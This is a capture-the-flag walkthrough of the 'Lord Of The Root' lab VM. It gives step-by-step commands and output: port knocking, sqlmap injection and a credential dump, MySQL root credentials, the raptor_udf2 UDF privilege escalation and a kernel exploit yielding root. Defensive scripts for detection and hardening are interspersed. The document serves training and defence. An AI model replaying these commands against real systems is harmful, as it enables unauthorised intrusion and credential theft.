VulnHub — Lord Of The Root: 1.0.1

Raj Singh
4 min read · Oct 15, 2019


Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 08:00:27:D9:1F:A2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10-4.11, Linux 3.16-4.6, Linux 3.2-4.9, Linux 4.4
Uptime guess: 197.261 days (since Mon Apr 1 09:49:49 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 10.0.0.28

The only open port is SSH, so let's connect to it.

The SSH banner contains the hint "KNOCK", so the box expects a port-knock sequence before it opens anything else. The most likely sequence is 1, 2, 3, so let's start with that.

After knocking ports 1, 2 and 3 in that order, a new HTTP service appears on port 1337.
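From the defensive side, a knock sequence like the one above leaves a clear trace in the firewall log: one source sending SYNs to the knock ports in order within a few seconds. The script below is an added example (not part of the original write-up) that finds such sequences in iptables LOG output. The log lines are constructed for the demo, the sequence 1, 2, 3 is the one used above, and the 10-second window is an assumed tuning value.

```python
"""Detect a port-knock sequence in iptables LOG output.

Added example, not code from the write-up. Assumes the host logs inbound
SYNs with the iptables LOG target; the sample lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

KNOCK_SEQUENCE = (1, 2, 3)   # ports, in order, from the write-up
WINDOW_SECONDS = 10          # assumed: whole sequence must finish inside this window

# Constructed iptables LOG lines (syslog prefix shortened for readability).
# 10.0.0.5 knocks correctly and then connects to 1337;
# 10.0.0.9 hits the ports out of order; 10.0.0.7 is too slow.
SAMPLE_LOG = """\
Oct 15 09:01:01 lotr kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.28 PROTO=TCP SPT=40001 DPT=1 SYN
Oct 15 09:01:02 lotr kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.28 PROTO=TCP SPT=40002 DPT=2 SYN
Oct 15 09:01:03 lotr kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.28 PROTO=TCP SPT=40003 DPT=3 SYN
Oct 15 09:01:04 lotr kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=10.0.0.28 PROTO=TCP SPT=40004 DPT=1337 SYN
Oct 15 09:02:10 lotr kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.28 PROTO=TCP SPT=51000 DPT=2 SYN
Oct 15 09:02:11 lotr kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.28 PROTO=TCP SPT=51001 DPT=1 SYN
Oct 15 09:02:12 lotr kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.28 PROTO=TCP SPT=51002 DPT=3 SYN
Oct 15 09:03:00 lotr kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.28 PROTO=TCP SPT=52000 DPT=1 SYN
Oct 15 09:03:20 lotr kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.28 PROTO=TCP SPT=52001 DPT=2 SYN
Oct 15 09:03:21 lotr kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.28 PROTO=TCP SPT=52002 DPT=3 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+) .*?\bSYN\b"
)


def parse_syns(log_text, year=2019):
    """Yield (timestamp, src, dport) for every logged SYN; skip other lines."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["src"], int(m["dpt"])


def find_knocks(log_text, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
    """Return {src: [completion_time, ...]} for sources that sent the knock
    ports in order within `window` seconds.  Any other port resets that
    source's progress, so 2,1,3 is not a match; a slow knock is dropped."""
    progress = defaultdict(lambda: [0, None])   # src -> [next index, start time]
    hits = defaultdict(list)
    for ts, src, dport in parse_syns(log_text):
        idx, start = progress[src]
        if start is not None and (ts - start).total_seconds() > window:
            idx, start = 0, None                   # took too long: start over
        if dport == sequence[idx]:
            if idx == 0:
                start = ts
            idx += 1
            if idx == len(sequence):
                hits[src].append(ts)
                idx, start = 0, None
        else:
            # wrong port breaks the sequence; it may itself be knock #1
            idx, start = (1, ts) if dport == sequence[0] else (0, None)
        progress[src] = [idx, start]
    return dict(hits)


if __name__ == "__main__":
    for src, times in find_knocks(SAMPLE_LOG).items():
        stamps = [t.strftime("%H:%M:%S") for t in times]
        print(f"{src}: completed knock sequence at {stamps}")
```

Run on the sample it reports only 10.0.0.5. On a real host the knock daemon itself usually knows the sequence, so the same logic can be fed the secret sequence and used to alert whenever a source other than an expected one completes it.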

Visiting port 1337 shows an image; the URL

http://10.0.0.28:1337/index.php shows a different image, and its page source contains a base64 string in an HTML comment.

Decoding that base64 string gives:

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

Decoding the Lzk3…aHA= part once more gives a URL path:

/978345210/index.php

which is a login page at http://10.0.0.28:1337/978345210/index.php
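The two-step decode above is easy to do by hand once, but the same pattern (base64 inside base64, hidden in a comment) comes up often enough that a small tool is worth having. The script below is an added example, not code from the write-up: it pulls HTML comments from a page, finds anything that looks like a base64 token, decodes it, and repeats on the result until nothing decodes to printable text. The middle layer and the final path are the ones shown above; the outer base64 layer and the surrounding HTML are constructed so the script runs offline.

```python
"""Peel nested base64 layers out of HTML comments.

Added example, not code from the write-up. INNER and the final path come
from the write-up; OUTER and SAMPLE_HTML are constructed for this demo.
"""
import base64
import binascii
import re

# Anything that looks like a base64 token: 8+ alphabet chars, optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
COMMENT = re.compile(r"<!--(.*?)-->", re.S)


def try_decode(token):
    """Return decoded text if `token` is valid base64 for printable ASCII, else None."""
    if len(token) % 4:
        return None                     # real base64 is padded to a multiple of 4
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def peel_layers(text, max_depth=5):
    """Repeatedly decode base64 tokens found in `text`; return each layer in order.

    Stops when no token in the current layer decodes to printable text, or
    after `max_depth` rounds (guard against pathological input)."""
    layers = []
    current = text
    for _ in range(max_depth):
        decoded = None
        for token in B64_TOKEN.findall(current):
            decoded = try_decode(token)
            if decoded:
                break
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_from_html(html):
    """Decode layered base64 hidden in every HTML comment on a page."""
    results = []
    for comment in COMMENT.findall(html):
        results.extend(peel_layers(comment))
    return results


# Constructed sample: the write-up's middle layer wrapped in one more base64 layer.
INNER = "Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!"
OUTER = base64.b64encode(INNER.encode()).decode()
SAMPLE_HTML = f"<html><body><img src='x.jpg'><!-- {OUTER} --></body></html>"

if __name__ == "__main__":
    for depth, layer in enumerate(extract_from_html(SAMPLE_HTML), 1):
        print(f"layer {depth}: {layer}")
```

The `isprintable()` check is what stops the loop: `/978345210/index` happens to be a syntactically valid base64 token, but it decodes to non-ASCII bytes, so the script correctly treats the path as the final layer rather than decoding garbage.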

Let's test the login form for SQL injection with sqlmap:

sqlmap --url http://10.0.0.28:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch

sqlmap confirms the form is injectable and enumerates the databases; the user credentials are in the Webapp database:

sqlmap --url http://10.0.0.28:1337/978345210/index.php --forms --dbs --level=5 --risk=3 -D Webapp -T Users --columns --dump

Dumping the Users table gives the credentials:

Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

Using smeagol's username and password we get an SSH session.

In /var/www/978345210/login.php we find the MySQL root credentials:

$db = new mysqli('localhost', 'root', 'darkshadow', 'Webapp');
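Two things in that login page made the rest of this box possible: the query is injectable (which is how sqlmap dumped the table) and the application connects to MySQL as root (which is what the privilege escalation below builds on). The script below is an added example, not the VM's login.php: it seeds an in-memory SQLite table with the Users rows dumped above, shows the string-built query pattern that sqlmap exploits beside a parameterised query, and demonstrates that the classic tautology input only succeeds against the former. The tautology string and the use of SQLite are assumptions for the demo.

```python
"""Injectable login query beside its parameterised form.

Added example, not the VM's login.php. Uses an in-memory SQLite database
seeded with the Users rows from the write-up.
"""
import sqlite3

# Rows as dumped by sqlmap in the write-up.
USERS = [
    (1, "frodo", "iwilltakethering"),
    (2, "smeagol", "MyPreciousR00t"),
    (3, "aragorn", "AndMySword"),
    (4, "legolas", "AndMyBow"),
    (5, "gimli", "AndMyAxe"),
]


def make_db():
    """Create the Users table in memory and load the sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return db


def login_vulnerable(db, username, password):
    """Builds the SQL by string formatting, so quotes in the input become SQL syntax.
    This is the pattern sqlmap's --forms scan detects and exploits."""
    sql = (f"SELECT id FROM Users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    """Parameterised query: the driver passes the values separately from the SQL
    text, so a quote in the input is compared as data, never parsed as syntax."""
    sql = "SELECT id FROM Users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"          # classic textbook input (assumed for the demo)
    print("vulnerable, real creds:", login_vulnerable(db, "smeagol", "MyPreciousR00t"))
    print("vulnerable, tautology :", login_vulnerable(db, tautology, tautology))
    print("safe, real creds      :", login_safe(db, "smeagol", "MyPreciousR00t"))
    print("safe, tautology       :", login_safe(db, tautology, tautology))
```

Beyond the query itself, the fix for this page has two more parts the example does not show: the web application should connect with a dedicated MySQL account that can only read and write the Webapp schema (never root), and the password column should hold salted hashes rather than the plaintext values sqlmap was able to dump.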

A MySQL user-defined-function (UDF) local privilege escalation exploit is on Exploit-DB (http://www.exploit-db.com/exploits/1518); we'll use 1518.c to escalate to root.

Transfer 1518.c to the target with a Python HTTP server, rename it to raptor_udf2.c and follow the steps below.

Copy raptor_udf2.c to smeagol's home directory and follow these steps:

* gcc -g -c raptor_udf2.c
* gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* mysql -u root -p   # log in with the password darkshadow
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* # id
  uid=0(root) gid=0(root) groups=0(root)

And we got the root shell
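Every step in that sequence depends on a server setting a DBA can check: load_file() and INTO DUMPFILE on arbitrary paths only work when secure_file_priv is empty, the resulting shell is only root because mysqld runs as root, and the whole thing leaves a row in mysql.func. The script below is an added example (not from the write-up or the raptor_udf2 exploit) that audits those three conditions from the tab-separated output `mysql -e` prints when it is not attached to a terminal. The sample outputs, the process owner and the empty allow-list are constructed assumptions for the demo.

```python
"""Audit a MySQL server for the preconditions of the UDF privilege escalation.

Added example, not code from the write-up. Parses the batch-mode output of
`mysql -e "SHOW VARIABLES"` and `mysql -e "SELECT name, dl FROM mysql.func"`
(constructed samples below) and flags the settings the technique needs.
"""

# Shared libraries this deployment legitimately registers as UDFs.
# Assumed empty: a stock server has no rows in mysql.func.
ALLOWED_UDF_LIBS = frozenset()

# Constructed: SHOW VARIABLES in batch mode (header row, tab-separated columns).
SAMPLE_VARIABLES = """\
Variable_name\tValue
plugin_dir\t/usr/lib/mysql/plugin/
secure_file_priv\t
version\t5.5.44-0ubuntu0.14.04.1
"""

# Constructed: mysql.func after the steps above have been run.
SAMPLE_FUNCS = """\
name\tdl
do_system\traptor_udf2.so
"""

# Constructed: what a hardened server would print instead.
HARDENED_VARIABLES = """\
Variable_name\tValue
plugin_dir\t/usr/lib/mysql/plugin/
secure_file_priv\t/var/lib/mysql-files/
"""
HARDENED_FUNCS = "name\tdl\n"


def parse_batch(output):
    """Turn mysql batch output (header line, then tab-separated rows) into tuples."""
    rows = []
    for line in output.splitlines()[1:]:
        if line:
            rows.append(tuple(line.split("\t")))
    return rows


def audit(variables_output, funcs_output, mysqld_user):
    """Return a list of findings; an empty list means nothing was flagged."""
    variables = {r[0]: (r[1] if len(r) > 1 else "") for r in parse_batch(variables_output)}
    findings = []
    if variables.get("secure_file_priv", "") == "":
        findings.append("secure_file_priv is empty: LOAD_FILE() and SELECT ... INTO DUMPFILE "
                        "can read and write any path the server process can")
    if mysqld_user == "root":
        findings.append("mysqld runs as root: any UDF it loads executes with uid 0")
    for row in parse_batch(funcs_output):
        name, lib = row[0], row[1] if len(row) > 1 else ""
        if lib not in ALLOWED_UDF_LIBS:
            findings.append(f"unexpected UDF {name}() loaded from {lib!r}")
    return findings


if __name__ == "__main__":
    print("== as found on the VM (assumed mysqld user: root) ==")
    for f in audit(SAMPLE_VARIABLES, SAMPLE_FUNCS, "root"):
        print(" -", f)
    print("== hardened ==")
    print(audit(HARDENED_VARIABLES, HARDENED_FUNCS, "mysql") or "nothing flagged")
```

On a real host the three inputs come from `mysql -e "SHOW VARIABLES"`, `mysql -e "SELECT name, dl FROM mysql.func"` and `ps -o user= -C mysqld`; setting secure_file_priv to a dedicated directory, running mysqld as an unprivileged account and alerting on any new row in mysql.func removes every step the procedure above relies on.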

ANOTHER WAY TO PRIVILEGE ESCALATION

Checking the kernel version shows it is vulnerable, and the exploit is on Exploit-DB (https://www.exploit-db.com/exploits/39166).

Transfer the exploit to the target, then compile and run it:

smeagol@LordOfTheRoot:~$ gcc 39166.c -o overlayfail 
smeagol@LordOfTheRoot:~$ ./overlayfail
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# cd /root/
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root#

So we got root two different ways.

…………………………………..COWABUNGA…………………………………..

Written by Raj Singh, Security Researcher, Product Security Engineer